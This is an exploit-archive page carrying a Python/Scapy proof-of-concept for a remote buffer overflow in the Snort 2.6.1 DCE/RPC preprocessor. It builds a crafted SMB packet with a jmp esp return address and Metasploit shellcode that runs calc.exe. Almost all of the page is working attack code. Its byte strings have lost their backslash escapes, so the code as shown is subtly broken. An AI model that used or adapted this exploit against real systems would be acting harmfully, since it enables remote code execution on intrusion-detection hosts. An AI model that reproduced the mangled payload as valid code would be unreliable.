Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit
# Published : 2007-03-01
# Author : Trirat Puttaraksa
# Previous Title : madwifi <= 0.9.2.1 WPA/RSN IE Remote Kernel Buffer Overflow Exploit
# Next Title : WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC

#!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)
# 
# Author: Trirat Puttaraksa <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purpose only
#
# This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1
#
# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) 
# to inject the packet, so you have to install Scapy before use it.
#
#######################################################

import sys
from scapy import *
from struct import pack
conf.verb = 0

# NetBIOS Session Service
payload = "x00x00x02xab"

# SMB Header
payload += "xffx53x4dx42x75x00x00x00x00x18x07xc8x00x00"
payload += "x00x00x00x00x00x00x00x00x00x00x00x00xffxfe"
payload += "x00x08x30x00"

# Tree Connect AndX Request
payload += "x04xa2x00x52x00x08x00x01x00x27x00x00"
payload += "x5cx00x5cx00x49x00x4ex00x53x00x2dx00x4bx00x49x00"
payload += "x52x00x41x00x5cx00x49x00x50x00x43x00x24x00x00x00"
payload += "x3fx3fx3fx3fx3fx00"

# NT Create AndX Request
payload += "x18x2fx00x96x00x00x0ex00x16x00x00x00x00x00x00x00"
payload += "x9fx01x02x00x00x00x00x00x00x00x00x00x00x00x00x00"
payload += "x03x00x00x00x01x00x00x00x40x00x40x00x02x00x00x00"
payload += "x01x11x00x00x5cx00x73x00x72x00x76x00x73x00x76x00"
payload += "x63x00x00x00"

# Write AndX Request #1
payload += "x0ex2fx00xfex00x00x40x00x00x00x00xffxffxffxffx80"
payload += "x00x48x00x00x00x48x00xb6x00x00x00x00x00x49x00xee"

#payload += "x05x00x0bx03x10x00x00x00xffx01x00x00x01x00x00x00"
payload += "x05x00x0bx03x10x00x00x00x10x02x00x00x01x00x00x00"
payload += "xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00"
payload += "xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88"
payload += "x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00"
payload += "x2bx10x48x60x02x00x00x00"

# Write AndX Request #2
payload += "x0exffx00xdexdex00x40x00x00x00x00xffxffxffxffx80"
payload += "x00x48x00x00x00xffx01xcex01x00x00x00x00x49x00xee"

# 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com)
payload += "xedx1ex94x7cx90x81xc4xffxefxffxffx44"

payload += "x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9"
payload += "xd1x80xf5x83xebxfcxe2xf4x55x39xc4xf5xa9xd1x0bxb0"
payload += "x95x5axfcxf0xd1xd0x6fx7exe6xc9x0bxaax89xd0x6bxbc"
payload += "x22xe5x0bxf4x47xe0x40x6cx05x55x40x81xaex10x4axf8"
payload += "xa8x13x6bx01x92x85xa4xf1xdcx34x0bxaax8dxd0x6bx93"
payload += "x22xddxcbx7exf6xcdx81x1ex22xcdx0bxf4x42x58xdcxd1"
payload += "xadx12xb1x35xcdx5axc0xc5x2cx11xf8xf9x22x91x8cx7e"
payload += "xd9xcdx2dx7exc1xd9x6bxfcx22x51x30xf5xa9xd1x0bx9d"
payload += "x95x8exb1x03xc9x87x09x0dx2ax11xfbxa5xc1xafx58x17"
payload += "xdaxb9x18x0bx23xdfxd7x0ax4exb2xe1x99xcaxffxe5x8d"
payload += "xccxd1x80xf5"

payload += "x90"  # padding

if len(sys.argv) != 2:
	print "Usage snort_execute_dcerpc.py <fake destination ip>"
	sys.exit(1)

target = sys.argv[1]

p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
send(p)

# www.Syue.com [2007-03-01]